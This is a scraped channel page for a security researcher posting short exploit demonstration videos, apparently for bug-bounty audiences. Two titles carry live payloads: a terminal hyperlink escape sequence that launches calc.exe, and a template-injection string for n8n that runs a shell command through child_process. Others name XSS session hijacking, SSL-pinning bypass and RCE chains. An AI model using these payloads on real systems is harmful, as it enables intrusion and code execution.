NullSecurityX's banner

NullSecurityX

@NullSecurityX • 11,726 subscribers

Infosec researcher • Bug bounties & security analysis. https://t.co/kOIAd973sL Collabs/ads: DM 📥

Shorts

$Just like the classic Notepad Ctrl+Click RCE behavior, terminals on Windows, Linux, and macOS also support clickable file/URI handlers. printf "\x1b]8;;file:///C:/windows/system32/calc.exe\x07Click here\x1b]8;;\x1b\\n"$

Just like the classic Notepad Ctrl+Click RCE behavior, terminals on Windows, Linux, and macOS also support clickable file/URI handlers. printf "\x1b]8;;file:///C:/windows/system32/calc.exe\x07Click here\x1b]8;;\x1b\\n"

19,724 Aufrufe

Videos

Anya Rossi

sweetdream.ai

SweetDream.ai•Sponsored•Livecam

Watch Anya Live

Anya is streaming live right now! Join her private show and enjoy exclusive content.

Exclusive private shows

1.2k viewers online

Private Show

Join now for exclusive access

Free preview available • Premium content

Exploit PoC Telegram Web app XSS / Session Hijacking 1-click The XSS vulnerability is triggered using the event type web_app_open_link via postMessage. (CVE-2024–33905)

Exploit PoC Telegram Web app XSS / Session Hijacking 1-click The XSS vulnerability is triggered using the event type web_app_open_link via postMessage. (CVE-2024–33905)

91,745 Aufrufe • vor 1 Monat

Bypass Facebook SSL Version (latest version) Frida JS Script #Bugbounty #CyberSecurity

Bypass Facebook SSL Version (latest version) Frida JS Script #Bugbounty #CyberSecurity

50,097 Aufrufe • vor 2 Monaten

$Zero Click Unauthenticated RCE in n8n (CVE-2026-27493) The chain exploitation method is: Allow User input SSTI exploitation e.g. {{7*7}} ={{$node["NodeName"].constructor.constructor('return process.mainModule.require("child_process").execSync("id ").toString()')()}}$

Zero Click Unauthenticated RCE in n8n (CVE-2026-27493) The chain exploitation method is: Allow User input SSTI exploitation e.g. {{7*7}} ={{$node["NodeName"].constructor.constructor('return process.mainModule.require("child_process").execSync("id ").toString()')()}}

36,718 Aufrufe • vor 1 Monat

Exploiting llama.cpp’s RPC Server - From Null Buffer to RCE Against PIE + Full RELRO + NX | CVE-2026-34159: The vulnerability is a one-line logic bug in the RPC server’s tensor deserialization pipeline. Youtube: Blog:

Exploiting llama.cpp’s RPC Server - From Null Buffer to RCE Against PIE + Full RELRO + NX | CVE-2026-34159: The vulnerability is a one-line logic bug in the RPC server’s tensor deserialization pipeline. Youtube: Blog:

19,045 Aufrufe • vor 1 Monat

Delete highlight cover IDOR bug in Instagram $3000 Bug Bounty PoC Write-up:

Delete highlight cover IDOR bug in Instagram $3000 Bug Bounty PoC Write-up:

21,878 Aufrufe • vor 1 Monat

DarkForums has been hacked by NullSecurityX :) Jokes aside, we showcased the vulnerability found on Darkforums in the video. Happy hacking, everyone! 😊 Dark Web Informer #BugBounty #CyberSecurity #darkforum

DarkForums has been hacked by NullSecurityX :) Jokes aside, we showcased the vulnerability found on Darkforums in the video. Happy hacking, everyone! 😊 Dark Web Informer #BugBounty #CyberSecurity #darkforum

45,540 Aufrufe • vor 10 Monaten

XML External Entity (XXE) vulnerability in 2026 with a practical Proof of Concept (PoC) Follow us: #BugBounty #CyberSecurity

XML External Entity (XXE) vulnerability in 2026 with a practical Proof of Concept (PoC) Follow us: #BugBounty #CyberSecurity

11,524 Aufrufe • vor 2 Monaten

Keine weiteren Inhalte verfügbar